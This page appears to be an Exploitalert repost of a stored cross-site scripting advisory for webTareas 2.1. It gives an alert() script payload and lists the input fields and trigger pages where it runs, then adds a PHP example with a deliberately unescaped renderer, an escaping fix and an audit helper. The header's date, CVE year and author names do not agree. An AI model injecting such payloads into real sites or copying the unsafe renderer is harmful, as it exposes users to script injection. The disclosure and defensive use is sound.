Webtareas 2.1 / 2.1p Cross Site Scripting
CVE: CVE-2021-38733
Category: CWE-79
Price: Not specified
Severity: Medium
Author: Hacker-one
Risk: Medium
Exploitation Type: Remote
Date: 2020-07-12
CPE: cpe:cpe:/a:webtareas:webtareas:2.1.2.1
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070056 Below is a copy:
Webtareas 2.1 / 2.1p Cross Site Scripting
#Author: AppleBois
#Homepage: https://sourceforge.net/projects/webtareas/
#Affected Version: 2.1/2.1p
#Stored XSS
#Allows an attacker to execute arbitrary HTML and JavaScript code
#More info : https://medium.com/@tehwinsam/webtareas-2-1-c8b406c68c2a
#Solutions: "NONE"

Payload = <script>alert(AppleBois);</script>

Vulnerable page: /webtareas/clients/editclient.php
Vulnerable Input Tab: Name, City, Country, Phone, Fax

Vulnerable page: /webtareas/extensions/addextension.php?
Vulnerable Input Tab: Title
Trigger Page: /Tareas/webtareas/extensions/viewextension.php?id=1&borne1=0

Vulnerable page: /webtareas/administration/add_announcement.php?
Vulnerable Input Tab: Subject
Trigger Page: /webtareas/general/newnotifications.php

Vulnerable page: /webtareas/administration/departments.php?mode=add
Vulnerable Input Tab: Name printed
Trigger Page: /webtareas/administration/departments.php

Vulnerable page: /webtareas/administration/locations.php?mode=add
Vulnerable Input Tab: Name printed
Trigger Page: /webtareas/administration/locations.php?mode=list&msg=add#locAnchor

Vulnerable page: /webtareas/expenses/claim_type.php?mode=add#eExAnchor
Vulnerable Input Tab: Name printed
Trigger Page: /webtareas/expenses/editexpense.php?recurring=&project=0

Vulnerable page: /webtareas/projects/editproject.php
Vulnerable Input Tab: Name
Trigger Page: /webtareas/projects/viewproject.php?id={depend on the id of project}&msg=add#epDAnchor

Vulnerable page: /webtareas/general/newnotifications.php
*Triggers when <script>alert(AppleBois);</script> is found on Recent Visited Pages*
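The advisory lists no fix, so here is the defensive pattern that closes this class of bug: every stored field (Name, City, Subject, Title) must be HTML-escaped when it is written into a view page, and records saved before the fix should be audited. This is an added example written for this page, not webTareas code; the record layout and the two render functions are hypothetical, and the sample record is constructed from the advisory's own payload.

```php
<?php
// Added example, not webTareas code. Shows the pattern behind the stored XSS
// in this advisory: a value saved from a form field is later echoed into a
// view page unescaped. The hardened renderer escapes at output time so the
// advisory's payload is displayed as literal text instead of running.
declare(strict_types=1);

// Constructed sample record, as it would sit in the database after a user
// saved the advisory's payload into the client "Name" field.
$client = [
    'name'    => '<script>alert(AppleBois);</script>',
    'city'    => 'Paris',
    'country' => 'FR "quoted"',
];

// Vulnerable pattern (hypothetical, illustrates the bug): raw interpolation
// of stored values into markup, so any <script> in the data reaches the browser.
function renderClientUnsafe(array $c): string
{
    return "<h2>{$c['name']}</h2><p>{$c['city']}, {$c['country']}</p>";
}

// Escape helper: ENT_QUOTES also encodes ' and ", so the result is safe inside
// attribute values as well as element content; always name the charset.
function h(?string $s): string
{
    return htmlspecialchars((string) $s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened renderer: every stored field passes through h() at output time,
// including the value echoed back into the edit form's input attribute.
function renderClientSafe(array $c): string
{
    return '<h2>' . h($c['name']) . '</h2>'
         . '<p>' . h($c['city']) . ', ' . h($c['country']) . '</p>'
         . '<input type="text" name="name" value="' . h($c['name']) . '">';
}

// Audit helper for records saved before the fix: returns the names of fields
// whose value contains an HTML tag so an administrator can review them.
function findSuspiciousFields(array $row): array
{
    $hits = [];
    foreach ($row as $field => $value) {
        if (is_string($value) && preg_match('/<\s*\/?\s*[a-z][^>]*>/i', $value)) {
            $hits[] = $field;
        }
    }
    return $hits;
}

echo renderClientUnsafe($client), "\n"; // script tag survives into the page
echo renderClientSafe($client), "\n";   // tag is entity-encoded, shown as text
print_r(findSuspiciousFields($client)); // flags the field holding the payload
```

The same h() call belongs on every echo of a stored value in the trigger pages the advisory names, including the "Recent Visited Pages" list, since that list displays titles saved through the other forms.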
Copyright ©2024 Exploitalert.